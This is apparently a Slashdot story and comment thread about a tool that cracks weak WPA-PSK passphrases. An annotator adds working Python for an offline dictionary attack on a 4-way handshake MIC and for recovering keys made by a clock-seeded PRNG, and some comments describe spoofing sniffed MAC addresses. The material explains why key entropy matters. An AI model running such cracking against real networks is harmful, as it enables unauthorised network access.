WPA Weak Key Cracker
Glenn Fleishman writes "The folks at TinyPEAP released a cracking tool to break Wi-Fi Protected Access (WPA) keys. WPA is the replacement for weak WEP keys in the original 802.11b specification. Robert Moskowitz of ICSA Labs released a paper almost exactly a year ago documenting how WPA keys that were short and lacked randomness could be subject to cracks. This tool automates the process. Moskowitz advised choosing passphrases of more than 20 characters or generating random keys of at least 96 bits, but preferably 128 bits. Some tools exist to produce better keys, including chipmaker Broadcom's SecureEZSetup (in selected hardware) and Buffalo Technologies' hardware-based AOSS for automatic key generation and propagation. Enterprise-based WPA with 802.1X doesn't have this weakness: each user gets a long WPA key that's randomly generated and uniquely assigned--and can be frequently changed during a session."
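What "short passphrases lacking randomness" means in practice, as an added worked example (my code, not the TinyPEAP tool, Moskowitz's paper or anything from the post): WPA-PSK turns the passphrase into the 256-bit PMK with PBKDF2-HMAC-SHA1 salted by the SSID, the 4-way handshake derives the PTK from that PMK plus both MACs and both nonces, and message 2 carries a MIC keyed with the first 16 bytes of the PTK. Anyone who sniffs that one handshake can test passphrase guesses offline against the MIC, which is why a dictionary word falls and a 22-character random passphrase (128 bits from a 64-symbol alphabet) does not. The MAC addresses, nonces and the message 2 frame below are constructed so the example runs without a capture; a real tool reads them from a pcap, and the frame carries no key data, which a real message 2 would.

```python
import hashlib
import hmac
import secrets
import struct

MIC_OFFSET = 81  # EAPOL-Key MIC field occupies bytes 81..96 of the EAPOL frame


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    The first 16 bytes are the KCK, the key that authenticates the handshake messages."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes, desc_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP): HMAC-MD5. Version 2 (CCMP): HMAC-SHA1 truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if desc_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def eapol_key_msg2(snonce: bytes, desc_version: int, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal 4-way handshake message 2 (supplicant -> AP): EAPOL header + key descriptor.
    Key Info = descriptor version | Pairwise (bit 3) | MIC present (bit 8); no key data."""
    desc_type = 0xFE if desc_version == 1 else 0x02          # WPA vs RSN descriptor
    key_info = 0x0108 | desc_version
    body = struct.pack(">BHHQ", desc_type, key_info, 0, 1)    # type, info, key length, replay ctr
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
    body += mic + struct.pack(">H", 0)                        # MIC, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body        # EAPOL v1, type 3 (EAPOL-Key)


def make_capture(passphrase, ssid, aa, spa, anonce, snonce, desc_version=2) -> bytes:
    """Stand-in for a sniffed message 2, built with the real passphrase so its MIC verifies."""
    kck = ptk(wpa_psk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    blank = eapol_key_msg2(snonce, desc_version)
    return eapol_key_msg2(snonce, desc_version, eapol_mic(kck, blank, desc_version))


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, desc_version, wordlist):
    """Offline dictionary attack. Each guess costs one PBKDF2 (4096 HMAC-SHA1), one PRF and one
    MIC; nothing touches the network, so any passphrase in the list eventually falls."""
    seen = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        kck = ptk(wpa_psk(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, desc_version), seen):
            return cand
    return None


def random_passphrase(bits: int = 128) -> str:
    """Random passphrase per the 128-bit advice: 64-symbol alphabet = 6 bits/char, so 22 chars."""
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
    return "".join(secrets.choice(alphabet) for _ in range(-(-bits // 6)))


if __name__ == "__main__":
    # Constructed handshake parameters, not from any real capture.
    aa, spa = bytes.fromhex("000c41aabbcc"), bytes.fromhex("001122334455")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    cap = make_capture("password123", "HomeNet", aa, spa, anonce, snonce)
    print(crack_psk("HomeNet", aa, spa, anonce, snonce, cap, 2, ["password", "admin", "password123"]))
    print(random_passphrase())
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, which is why the advice is about passphrase entropy rather than about the derivation: a 20-plus character random passphrase puts the guess count out of reach, while the attack above never needs to talk to the access point. The 802.1X case is different because the PMK there comes from the EAP exchange, not from anything a user typed.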
So it's just a bruteforce/dictionary tool... (Score:2, Informative)
Re:What Morons (Score:2, Informative)
Re:By its nature... (Score:0, Informative)
Re:What Morons (Score:2, Informative)
Re:Odds of implementation? (Score:3, Informative)
Er, you mean WPA?
Re:What Morons (Score:4, Informative)
_YOUR_ wlan card may have the MAC address burned into it. Once ALL NIC did. I think it was more than 10 years ago that I saw my first NIC that DID NOT HAVE a MAC address (it was all zeroes, and expected to be set in software).
_MY_ wlan card will _CERTAINLY_ let me change the MAC address - under Linux _or_ Windows.
Re:don't blame WPA (Score:3, Informative)
Here's the correct link [gentoo.org]
Re:WPA Keys (Score:3, Informative)
Do your homework. Look up Supplicant, Xsupplicant, HostAP, 802.11i for Linux, 802.1x for Linux, etc, etc, etc... Lots of things going on.
ITMT... This crack is only for weak keys with WPA-PSK. Not applicable to WPA enterprise or WPA2.
Re:What Morons (Score:4, Informative)
No, you don't have to do this. Once the WEP key is broken (or if there is no WEP key, just MAC filtering), you simply listen to the traffic to get a MAC address that's allowed, and use that.
Regards,
--
*Art
Re:So it's just a bruteforce/dictionary tool... (Score:3, Informative)
Just name all your specific MAC addresses (Score:2, Informative)
How many home networks really need to allow random MAC addresses access?
Re:By its nature... (Score:1, Informative)
and I'm fairly certain it won't be compromised any time in the near future
--kingpunk
Re:By its nature... (Score:5, Informative)
Re:Suggestion (Score:3, Informative)
Of course if someone spends that much effort just to break into your wireless network you either have something really important or they have way too much time on their hands. (and I doubt if anyone has anything that important on their network....)
Re:What Morons (Score:4, Informative)
It's just that they cannot be authenticated in any way. It's like allowing only people who claim to be you on your network, rather than people who can prove it in some way.
Re:What Morons (Score:2, Informative)
WPA er Old News! (Score:3, Informative)
Re:Ho hum (Score:3, Informative)
Note that WPA is just like WEP but with quickly rotating keys and more secure key exchange. Yeah, you can't crack it in real-time to get on the network... but if you listen to the vendors carefully, they'll even say it... "Authentication, Authorization.... " But never will they formally say "Secure encryption of data"
You can decode everything but the key exchange off-line.
VPN software is the only way to go. The wireless vendors are liars.
Does anyone want to comment on WPA2? Does it require new hardware?
Re:By its nature... (Score:2, Informative)
Maybe you are talking about a specific implementation here (Linux I bet) and details are slightly different between different unix like systems...
The basic issue is that as soon as you think up a process that generates numbers in a way that you can describe mathematically, you also end up with a process incapable of generating real randomness.
You can get most aspects of randomness, but what you won't get, and that is the most important part for encryption, is unpredictability.
How predictable things are depends for a bit on the algorithm that you use, and for a large part on the ability to deduce the current state of the 'random generator'. If those 2 are known, the next number your random generator will produce can also be known.
This is why it is so important to have a good entropy source, it makes it virtually impossible to guess at the state of the generator.
Re:By its nature... (Score:3, Informative)
On Linux, that's wrong.
You're correct about everything else, though. The only thing you didn't know is that
> This is why it is so important to have a good entropy source, it makes it
> virtually impossible to guess at the state of the generator.
Now you're talking. That's why Linux uses the low bits of the CPU's clock cycle counter sampled during interrupts (which are generated by disks, the network, keyboards, and mice, etc. i.e. fairly unpredictable things, esp. wrt. exact numbers of CPU cycles!) It mixes these samples into its pool with cryptographically strong algorithms (insert hand-waving here...
If you're totally paranoid, RML's netdev-random patch will let you choose whether you want to add entropy from network interrupts to the entropy pool. Of course, you could also use rngd from rng-tools to feed entropy from your chipset's built-in rng (which measures thermal noise, and so has randomness that comes fairly directly from quantum mechanical processes, the only known source of true unpredictability in the Universe.)
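The point made in the two comments above (a generator whose algorithm and state can be deduced is predictable; a good entropy source is what makes the state unguessable) matters directly for the "generate a random 128-bit key" advice in the story, so here is an added example of it (my code, not from either commenter). The key generator is a hypothetical bad one: it seeds Python's Mersenne Twister, a public deterministic algorithm, with a clock reading and takes 128 bits. The attacker knows the algorithm and roughly when the key was made, so "deducing the state" is just enumerating seeds in a window and checking each candidate against something observable that depends on the key. The SHA-256 fingerprint stands in for that observable (in Wi-Fi terms it would be a handshake MIC); the seed value and the half-hour window are constructed for the example.

```python
import hashlib
import random
import secrets


def weak_key_from_clock(seed_seconds: int) -> bytes:
    """Hypothetical bad key generator: a public deterministic PRNG (Mersenne Twister)
    seeded with a clock reading. 128 output bits, but only as many bits of
    unpredictability as the attacker's uncertainty about the seed."""
    return random.Random(seed_seconds).getrandbits(128).to_bytes(16, "big")


def key_fingerprint(key: bytes) -> bytes:
    """Stand-in for any value an attacker can observe that depends on the key
    (a handshake MIC, an encrypted frame). Here simply SHA-256 of the key."""
    return hashlib.sha256(key).digest()


def recover_seed(fingerprint: bytes, approx_seconds: int, window: int = 1800):
    """Attacker knows the algorithm and the rough time of generation: recovering
    the generator state is a search over the seed space. Returns (seed, key) or None."""
    for s in range(approx_seconds - window, approx_seconds + window + 1):
        candidate = weak_key_from_clock(s)
        if key_fingerprint(candidate) == fingerprint:
            return s, candidate
    return None


def strong_key() -> bytes:
    """128 bits from the OS CSPRNG, which is seeded from the kernel entropy pool
    (interrupt timing, hardware RNG via rngd, etc.). No seed to enumerate."""
    return secrets.token_bytes(16)


if __name__ == "__main__":
    made_at = 1_100_000_000          # constructed "time the key was generated"
    weak = weak_key_from_clock(made_at)
    # Attacker only has the fingerprint and a guess of the time, off by 400 s.
    print(recover_seed(key_fingerprint(weak), made_at + 400))
    print(recover_seed(key_fingerprint(strong_key()), made_at))  # None: nothing to enumerate
```

The search above tries 3601 seeds; a 32-bit seed space with no time hint is about four billion, which is still a short computation rather than a 128-bit one. The generator's output length never enters into it, only how hard its state is to deduce, which is the commenter's point and the reason the key-generation tools mentioned in the story are only as good as their entropy source.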